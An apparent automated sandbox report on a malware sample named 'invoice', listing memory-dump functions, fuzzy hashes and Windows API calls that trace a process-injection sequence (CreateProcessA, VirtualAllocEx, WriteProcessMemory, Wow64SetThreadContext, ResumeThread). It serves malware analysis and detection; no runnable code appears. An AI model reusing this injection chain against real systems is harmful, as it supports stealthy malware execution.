Opcode Fuzzy Hash: b8deb919423315424cb6cecd5d1a16a971ff5f9534464b720424b5fc2df0cb8f
Instruction Fuzzy Hash: 645134B09002098FDB18DFAAD948BDEBBF1FF88314F248459D159A7360DB35A984CF65

Function 07EFDF47 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07EFE186

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 25b9f84a8439ac45ded9379c546254f9abde48e6238109065638524982a7a3a3
Instruction ID: 251df7de39d19d5c32c17d5257124ee773a39f923ad7ddb15cd63e13c3812556
Opcode Fuzzy Hash: 25b9f84a8439ac45ded9379c546254f9abde48e6238109065638524982a7a3a3
Instruction Fuzzy Hash: 4AA18FB1D0121ACFEB20CFA8CC417DDBBB2BF44318F148569E948A7650DB75A985CF91

Function 07EFDF50 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07EFE186

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3e12df738139aef522b54e89e96f4fc5107e1f1e9fdd8ce3a8598619b9397cec
Instruction ID: 388bdd007c94fa84e2232f3363a60173fa8112ccabea678c28ac280f019aa824
Opcode Fuzzy Hash: 3e12df738139aef522b54e89e96f4fc5107e1f1e9fdd8ce3a8598619b9397cec
Instruction Fuzzy Hash: CE917FB1D0121ACFEB24CFA8CC417DDBBB2BF44318F048169E948A7250DB75A985CF91

Function 016FB5DF Relevance: 1.7, APIs: 1, Instructions: 207COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 016FB846

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d63111603d1f2b52bffb81c55ad2cd00db5fb0b6cb0b65a7ac40ce04dad5557f
Instruction ID: 279f1f88ba7a895010e367989577415485d097ed0c763743afa3cb4473d583f8
Opcode Fuzzy Hash: d63111603d1f2b52bffb81c55ad2cd00db5fb0b6cb0b65a7ac40ce04dad5557f
Instruction Fuzzy Hash: B7812370A00B058FDB24DF29D8447AABBF2FF88200F048A2DD19ADBB50D775E945CB90

Function 016F63B4 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 016F6471

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f16066edd127176a587acc53d71412efd562ac36d350140c8b2d06ed4b0f9eb7
Instruction ID: 1cec9e384b8a6951cebe6f3e0bcdb65aa4cf197bc191b0ba9e207c510118baa1
Opcode Fuzzy Hash: f16066edd127176a587acc53d71412efd562ac36d350140c8b2d06ed4b0f9eb7
Instruction Fuzzy Hash: 194103B0C00219CFDB24DFA9C844BDEBBF6BF49304F24806AD518AB265DB755945CF90

Function 016F4BE0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 016F6471

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ccdb026cd187e8488bad6b88b48f3816bd5e259cd43b1e0e3dbddeb1ad14e981
Instruction ID: 7dcd07b5e3411a103a90cb96c1d6cd3cad069b05f27001f59227cc7cde5696de
Opcode Fuzzy Hash: ccdb026cd187e8488bad6b88b48f3816bd5e259cd43b1e0e3dbddeb1ad14e981
Instruction Fuzzy Hash: D741E2B0C0061DCFDB24DFA9C844B9EBBF6BF49304F24806AD508AB265DB756945CF90

Function 07EFDCC8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07EFDD58

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ee190104a7d1641a3f2c7caffe343db475e19c942d9e7bb2d56c90451455c76a
Instruction ID: dc0393718681b82dfe218725776547cacc3164dbaf718ec2c368973edadb4dcc
Opcode Fuzzy Hash: ee190104a7d1641a3f2c7caffe343db475e19c942d9e7bb2d56c90451455c76a
Instruction Fuzzy Hash: 5D2127B19003599FCB10CFA9C885BDEBBF5FF48314F10842AE959A7250C7799944CBA4

Function 07EFDCC0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07EFDD58

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 25829e996bc16e10cc7f9b355228f9f14dd6c72ebc3df85fde091e0d7e64820a
Instruction ID: 0cfbf875308fe69ecfb7c62129724a942d93118218a37073963804342af271e6
Opcode Fuzzy Hash: 25829e996bc16e10cc7f9b355228f9f14dd6c72ebc3df85fde091e0d7e64820a
Instruction Fuzzy Hash: 8A2144B69003599FCB10CFA9C981BEEBBF1FF48314F10842AE958A7250C7799944CBA4

Function 07EFDDB0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07EFDE38

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 795f06f49db5b1933c362b6fdb6f6f6f3a622be511f06f4a42012751187c6b1d
Instruction ID: 666dbb832327dae3de7e4c61d0c4af717551388d809bc793c19cc1609b08810f
Opcode Fuzzy Hash: 795f06f49db5b1933c362b6fdb6f6f6f3a622be511f06f4a42012751187c6b1d
Instruction Fuzzy Hash: 492125B19003599FCB10CFAAC841BEEFBF5FF88314F10842AE959A7250C7799545CBA4

Function 07EFDB28 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07EFDBAE

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e3fa27c63cd55767c9fe128210a15b1bf02cf494d97e5fd6a9faaa35cddd00fe
Instruction ID: 822c102c5812ba083054ed362bc02ab4e2bd3aa75e1cfeda9b56017b8e72d7ae
Opcode Fuzzy Hash: e3fa27c63cd55767c9fe128210a15b1bf02cf494d97e5fd6a9faaa35cddd00fe
Instruction Fuzzy Hash: 912149B1D00309DFDB10DFA9C9857EEBBF4AF88324F14842AD559A7640C7789585CFA4

Function 016FDAB8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FDB47

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 00e2d3a1dd4b8b5d3b6acb033004e4f0a5d8bc17c933dcbe31775f49161aa10d
Instruction ID: b0b9703c1b07ff5723c5fdbc6105a76af0e954439e083636873a376dd8f3e471
Opcode Fuzzy Hash: 00e2d3a1dd4b8b5d3b6acb033004e4f0a5d8bc17c933dcbe31775f49161aa10d
Instruction Fuzzy Hash: FD21E5B5900219DFDB10CF9AD984AEEBFF5FB48310F14802AE955A3350C375A954CF60

Function 07EFDDB8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07EFDE38

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4d777220a4db0712f4af2a785e55a63e33e60788f9ca53c854f5daad0688aa70
Instruction ID: 745a6d3faeb56e9820cc1cd03103ac385eb64f162041755cff5d2ff03617f1a0
Opcode Fuzzy Hash: 4d777220a4db0712f4af2a785e55a63e33e60788f9ca53c854f5daad0688aa70
Instruction Fuzzy Hash: 8F2128B1D002599FCB10DFAAC841BEEFBF5FF48314F10842AE559A7250C7759544CBA4

Function 07EFDB30 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07EFDBAE

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: baf5730dd370f0b12a85751ff959a0ad23ce481b0c9bb597e43f8b3406298727
Instruction ID: a58f596455772cccb5666fbbb799f930a520177ff4bf493c33513c36682fd74f
Opcode Fuzzy Hash: baf5730dd370f0b12a85751ff959a0ad23ce481b0c9bb597e43f8b3406298727
Instruction Fuzzy Hash: 78211AB19002099FDB10DFAAC4857EEBBF4EF49324F148429D559A7240C7789585CFA5

Function 016FDAC0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016FDB47

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d279bee6e84c0e714cc216e78cc061c3c81847c43a2168c7a38bd7d8a1a5f40f
Instruction ID: 6303d0cf74aee560cc680aa4f767c6275940746268f2dcc29b19d28528a5c3ca
Opcode Fuzzy Hash: d279bee6e84c0e714cc216e78cc061c3c81847c43a2168c7a38bd7d8a1a5f40f
Instruction Fuzzy Hash: 2E21E0B59002089FDB10CFAAD984ADEFBF8EB48320F14801AE958A3310C375A944CFA4

Function 07EFDC01 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07EFDC76

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e8d6b8fa8227f38a3f413d4dc676a006d76500320e65dc66f9a9040a321fa8b
Instruction ID: 55e8a2ef1ee273857c8daebf7a4a1ecf6aeafb699151a6848603cbe3a9c0a646
Opcode Fuzzy Hash: 2e8d6b8fa8227f38a3f413d4dc676a006d76500320e65dc66f9a9040a321fa8b
Instruction Fuzzy Hash: E81156B2900249CFCB10DFA9C945BEEBFF5EF88324F24882AE559A7250C7759554CFA0

Function 07EFDC08 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07EFDC76

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d7b29829f816959ae88def1d0fda7f38c34dab692a7bbaede973c05559b98073
Instruction ID: 04ec5f54f5820e70338af09d67ae34951793796f95eb15a7bd2a7d0361df0f56
Opcode Fuzzy Hash: d7b29829f816959ae88def1d0fda7f38c34dab692a7bbaede973c05559b98073
Instruction Fuzzy Hash: C41137B19002499FCB10DFAAC845BDEFFF5EF88324F108419E559A7250C775A554CFA4

Function 07EFDA79 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07EFDAE2

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8200945c156f65b4cfc9bc2b3fb19d1a15dbc72c562149c2c03db0f4fe187bd9
Instruction ID: 613250b44ed0262adcc2e49dbfdca41f8f7cc3c10de3c5238b31e05a151214b4
Opcode Fuzzy Hash: 8200945c156f65b4cfc9bc2b3fb19d1a15dbc72c562149c2c03db0f4fe187bd9
Instruction Fuzzy Hash: 2B1149B19003498FCB10DFAAC8457DEFBF4EF88324F208429D559A7250C775A544CB94

Function 07EFDA80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07EFDAE2

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f0af0428d16e9e1600f99c5727820716b881b7194ef99fe28177b03f4a8a156d
Instruction ID: 84c316525cdd299bb1eee1e440780d9cc2a1612e10fde58ccf0de6f795ce5be5
Opcode Fuzzy Hash: f0af0428d16e9e1600f99c5727820716b881b7194ef99fe28177b03f4a8a156d
Instruction Fuzzy Hash: 461128B19002498FCB10DFAAC4457DEFBF8AB88324F20841AD559A7250CA75A544CB94

Function 016FB7E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 016FB846

Memory Dump Source

Source File: 00000000.00000002.1710592193.00000000016F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_invoice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3c28b38551aee1bf08338a75016805ac30bcdb5591eb0ac3e9b32118f210af86
Instruction ID: 5575c17290b35200192f7607fe53c1664ec0f0dfdcde1ffa003f2e55b73b1779
Opcode Fuzzy Hash: 3c28b38551aee1bf08338a75016805ac30bcdb5591eb0ac3e9b32118f210af86
Instruction Fuzzy Hash: C6110FB6C002498FDB10CF9AD844ADEFBF8EF88324F10842AD569A7610C375A545CFA5

Function 0DCB1200 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0DCB125D

Memory Dump Source

Source File: 00000000.00000002.1720301114.000000000DCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DCB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dcb0000_invoice.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: aa2b89d012e4e25d330cd273e9fb50ebc9ceb5046a4edf6794465fde72d5de95
Instruction ID: dd83956e09cd7c1cba0b1437252bceef1536f75b74beb9cb0b8c82c1af3b7da3
Opcode Fuzzy Hash: aa2b89d012e4e25d330cd273e9fb50ebc9ceb5046a4edf6794465fde72d5de95
Instruction Fuzzy Hash: 5711E5B5900349DFDB10DF9AD485BDEFBF8EB48324F14841AD558A7210C375A944CFA5

Function 0169D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710236992.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_169d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de5872da7a4952ab9ff7bd342d798550cf97c4d3a208cb56df14af453432fc09
Instruction ID: 1d258a5b76d88c80b80f29a624463233a2732bb8dab73e1e373fb096008b1aa8
Opcode Fuzzy Hash: de5872da7a4952ab9ff7bd342d798550cf97c4d3a208cb56df14af453432fc09
Instruction Fuzzy Hash: D421D0B1504240EFDF05DF58DAC0B2ABF69FB88728F24C579E9094B256C336D456CBA2

Function 0169D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710236992.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_169d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81006123e5d9fe83e6bec92ef96b4a3791aff1ed94279306347a4c1e51cc32cb
Instruction ID: 65e1e651460380aa53f91fdf8be719dab6cd1669e257c40fd48846d43c628085
Opcode Fuzzy Hash: 81006123e5d9fe83e6bec92ef96b4a3791aff1ed94279306347a4c1e51cc32cb
Instruction Fuzzy Hash: 3F210671500204DFDF05DF58D9C0B6ABF69FB94724F20C179D9094B356C336E456C6A1

Function 016AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710379375.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b15e23f42744429f3319f6cfc033fe24759bd68a340b34e7f1ef6b16e1dc02
Instruction ID: 04ccf4cda190b6df830098b55e26c7ff2bafbecdc9ca49b985a27fa2b9ec2bf9
Opcode Fuzzy Hash: 44b15e23f42744429f3319f6cfc033fe24759bd68a340b34e7f1ef6b16e1dc02
Instruction Fuzzy Hash: 8B212F71684200DFCB15DF68D984B26BFA5EB88314F60C56DE80A4B796C33AD847CA61

Function 016AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710379375.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa8782da3c9a593ed7d78a173cf4559581ad7fc6d5aae63ca965304954d234f1
Instruction ID: 105fe9f1e22f604f369c221954f4e4bd81e1d4026e2c32ddf28b33e5d23cbf95
Opcode Fuzzy Hash: aa8782da3c9a593ed7d78a173cf4559581ad7fc6d5aae63ca965304954d234f1
Instruction Fuzzy Hash: CB210771504200EFDB05DF98D9C4B26BBA5FB84324F60C56DDA094B756C336DC46CE61

Function 016AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710379375.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39078bcb9b33b6dd580cbf50a2aa58c0cef876966f3ec6a8d543abbc89363415
Instruction ID: 196573512b5153eeb9426598234adc2da256593d684d4630d27d216bd0e34bd8
Opcode Fuzzy Hash: 39078bcb9b33b6dd580cbf50a2aa58c0cef876966f3ec6a8d543abbc89363415
Instruction Fuzzy Hash: 602192755483809FDB03CF54D994B11BF71EB46314F28C5DAD8498F6A7C33A984ACB62

Function 0169D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710236992.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_169d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: e4eedaf71212e0ada354f59693c214d46b2acf049339b3c54ccaa819da678e79
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: C311E176404280CFCF02CF54D9C4B16BF71FB84328F24C6A9D8090B256C336D45ACBA1

Function 0169D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710236992.000000000169D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0169D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_169d000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 8b6aab68098bbd9a4bd2399ff85cc0a0ff9db5d1e3bc0df904b50febaa6ab472
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 8311DC72404280DFDF02CF44D9C4B5ABF72FB94724F24C2A9D9090B256C33AE45ACBA2

Function 016AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1710379375.00000000016AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16ad000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 22b1530e5c014d7d7698798b032d1452ec53861ba4586ef1cd52da0e1974d1d2
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4E11BB75504280DFDB02CF54C9C4B15BFA1FB84224F24C6AAD9494B7A6C33AD80ACF61

Non-executed Functions

Function 07EF2A40 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

'<"C, xrefs: 07EF2BA0
'<"C, xrefs: 07EF2BA7
NvTt, xrefs: 07EF2B08

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: '<"C$'<"C$NvTt
API String ID: 0-1787953242
Opcode ID: 30265e725c470042c3e4216be12a1d6df22b9c343b2bb92d5c9b0a489971aba5
Instruction ID: cd3224fb1a6dc84a7223a0ccbdd6bfa4c1304c33a1a361d835f97370dcbc5384
Opcode Fuzzy Hash: 30265e725c470042c3e4216be12a1d6df22b9c343b2bb92d5c9b0a489971aba5
Instruction Fuzzy Hash: 805125B4E1220A8FCB14CFAAD5855EEFBF6BF88310F10E42AE915A7354E7345A418F51

Function 07EF2A33 Relevance: 3.9, Strings: 3, Instructions: 143COMMON

Download Yara Rule

Strings

'<"C, xrefs: 07EF2BA0
'<"C, xrefs: 07EF2BA7
NvTt, xrefs: 07EF2B08

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: '<"C$'<"C$NvTt
API String ID: 0-1787953242
Opcode ID: c372879e98f56f1c5c703c6d0dc07e5d38b722ff33a53d67e971e77f30008a17
Instruction ID: 3f61884ad66de906ed02d37f1434cf7a52f5261b76bde5bc82edd55341a5d32f
Opcode Fuzzy Hash: c372879e98f56f1c5c703c6d0dc07e5d38b722ff33a53d67e971e77f30008a17
Instruction Fuzzy Hash: 365125B4E1220A9FCB14CFAAD4455AEFBF6FF88310F10E42AE915A7354E7345A418F51

Function 07EF2368 Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

4$VD, xrefs: 07EF222F
sX, xrefs: 07EF2557

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: 4$VD$sX
API String ID: 0-3616487683
Opcode ID: 3bfb37ac9f1dd042cec9c029e2563191984b9c3c4f9d25df00f9d0968b9b6e65
Instruction ID: a855a0910ff5937926d8b3ace5f06fba25fd3aaf06171f5195d8692c59164481
Opcode Fuzzy Hash: 3bfb37ac9f1dd042cec9c029e2563191984b9c3c4f9d25df00f9d0968b9b6e65
Instruction Fuzzy Hash: B6A117B0E1620A8FDB04CFA9D9804EEFBF6FF89210F14A42AD615B7214D3349A41CF65

Function 07EFB620 Relevance: 1.6, Strings: 1, Instructions: 312COMMON

Download Yara Rule

Strings

?8, xrefs: 07EFB67B

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: ?8
API String ID: 0-3288465736
Opcode ID: ad086dfc85c557dc0630f33c1ad08cff4417db04bb374d81a510109477ffc5fd
Instruction ID: f409135b9f2a3d2ad8c6a9efa640b2379e1c65c717df9a3b8aecc3b6f9462e97
Opcode Fuzzy Hash: ad086dfc85c557dc0630f33c1ad08cff4417db04bb374d81a510109477ffc5fd
Instruction Fuzzy Hash: E1E129B4E011198FCB14DFA9D5809AEFBB2FF89304F249169E518AB356DB30AD41CF60

Function 07EF25CB Relevance: 1.5, Strings: 1, Instructions: 246COMMON

Download Yara Rule

Strings

sX, xrefs: 07EF2557

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: sX
API String ID: 0-3110708420
Opcode ID: 5d0879414352e2b6d7d164d9ab9f4f87cb2ffa8f643731ba07b9b12891b12fa3
Instruction ID: dd975f146afc655557fb8ab2ada64ed990f8daefc62df0cecbaa961cfc96caa1
Opcode Fuzzy Hash: 5d0879414352e2b6d7d164d9ab9f4f87cb2ffa8f643731ba07b9b12891b12fa3
Instruction Fuzzy Hash: 54B128B4E1620ADFCB04CFA9C5808EEFBF5FF89310F24A46AD615B7614D3349A418B65

Function 07EF2378 Relevance: 1.4, Strings: 1, Instructions: 161COMMON

Download Yara Rule

Strings

sX, xrefs: 07EF2557

Memory Dump Source

Source File: 00000000.00000002.1715988344.0000000007EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ef0000_invoice.jbxd

Similarity

API ID:
String ID: sX
API String ID: 0-3110708420
Opcode ID: 1b94f0f6f482a9fa7c4cece90345851634aade8fee9c020cf4d3063f58517a50
Instruction ID: a5633c5b1cc5f391891c6dc63a9e0206ef742c48119221fbbaf7bb0913d79577
Opcode Fuzzy Hash: 1b94f0f6f482a9fa7c4cece90345851634aade8fee9c020cf4d3063f58517a50
